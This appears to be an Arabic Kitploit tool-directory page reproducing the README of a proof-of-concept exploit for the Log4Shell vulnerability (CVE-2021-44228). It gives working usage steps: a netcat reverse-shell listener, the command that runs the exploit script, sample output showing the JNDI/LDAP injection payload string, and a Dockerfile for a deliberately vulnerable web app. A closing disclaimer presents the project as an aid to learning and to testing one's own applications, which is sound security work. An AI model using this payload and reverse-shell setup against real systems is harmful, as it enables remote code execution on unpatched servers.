Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
log4j-shell-poc — إثبات مفهوم للثغرة الأمنية CVE-2021-44228. | Kitploit
أدوات/GitHubGitHub/kozmer/log4j-shell-poc
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمArchived
GitHubkozmer/log4j-shell-poc

log4j-shell-poc

إثبات مفهوم للثغرة الأمنية CVE-2021-44228.

عرض المستودع
1.9k541منذ 2 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

log4j-shell-poc

إثبات مفهوم (PoC) للثغرة الأمنية المكتشفة مؤخرًا CVE-2021-44228.

مؤخرًا، تم اكتشاف ثغرة أمنية جديدة في log4j، وهي مكتبة تسجيل جافا تُستخدم على نطاق واسع في أنظمة مثل Elasticsearch و Minecraft والعديد من الأنظمة الأخرى.

في هذا المستودع، يوجد تطبيق مثال ضعيف وإثبات مفهوم (POC) لاستغلاله.

إثبات المفهوم (POC)

كإثبات للمفهوم، يوجد ملف بايثون يقوم بأتمتة العملية.

المتطلبات:

root@kitploit:~
pip install -r requirements.txt

الاستخدام:

  • قم بتشغيل مستمع netcat لاستقبال اتصال الصدفة العكسية.
root@kitploit:~
nc -lvnp 9001
  • قم بتشغيل أداة الاستغلال.
    ملاحظة: لكي يعمل هذا، يجب تسمية أرشيف جافا المستخرج بـ jdk1.8.0_20، وأن يكون في نفس الدليل.
root@kitploit:~
$ python3 poc.py --userip localhost --webport 8000 --lport 9001

[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc

[+] Exploit java class created success
[+] Setting up fake LDAP server

[+] Send me: ${jndi:ldap://localhost:1389/a}

Listening on 0.0.0.0:1389

سيقوم هذا البرنامج النصي بإعداد خادم HTTP وخادم LDAP لك، وسيقوم أيضًا بإنشاء الحمولة (payload) التي يمكنك لصقها في الباراميتر الضعيف. بعد ذلك، إذا سارت الأمور بشكل جيد، يجب أن تحصل على صدفة على المنفذ lport.


التطبيق الضعيف

يوجد ملف Dockerfile مع تطبيق ويب ضعيف. يمكنك استخدامه باتباع الخطوات التالية:

root@kitploit:~
1: docker build -t log4j-shell-poc .
2: docker run --network host log4j-shell-poc

بمجرد تشغيله، يمكنك الوصول إليه على localhost:8080


الحصول على إصدار جافا.

توفر Oracle لحسن الحظ أرشيفًا لجميع إصدارات جافا السابقة:
https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html.
قم بالتمرير لأسفل إلى 8u20 وقم بتنزيل الملفات المناسبة لنظام التشغيل والأجهزة الخاصة بك. لقطة شاشة من 2021-12-11 00-09-25

ملاحظة: تحتاج إلى إنشاء حساب لتتمكن من تنزيل الحزمة.

بمجرد تنزيل وفك ضغط الأرشيف، يمكنك العثور على java وبعض الملفات الثنائية ذات الصلة في jdk1.8.0_20/bin.
ملاحظة: تأكد من فك ضغط مجلد jdk في هذا المستودع بنفس الاسم لكي يعمل.

root@kitploit:~
❯ tar -xf jdk-8u20-linux-x64.tar.gz

❯ ./jdk1.8.0_20/bin/java -version
java version "1.8.0_20"
Java(TM) SE Runtime Environment (build 1.8.0_20-b26)
Java HotSpot(TM) 64-Bit Server VM (build 25.20-b23, mixed mode)

إخلاء مسؤولية

هذا المستودع ليس مخصصًا ليكون أداة استغلال بنقرة واحدة لـ CVE-2021-44228. الغرض من هذا المشروع هو مساعدة الأشخاص على التعرف على هذه الثغرة الأمنية، وربما اختبار تطبيقاتهم الخاصة (ومع ذلك هناك تطبيقات أفضل لهذا الغرض، مثل: https://log4shell.tools/).

تنزيل الأداة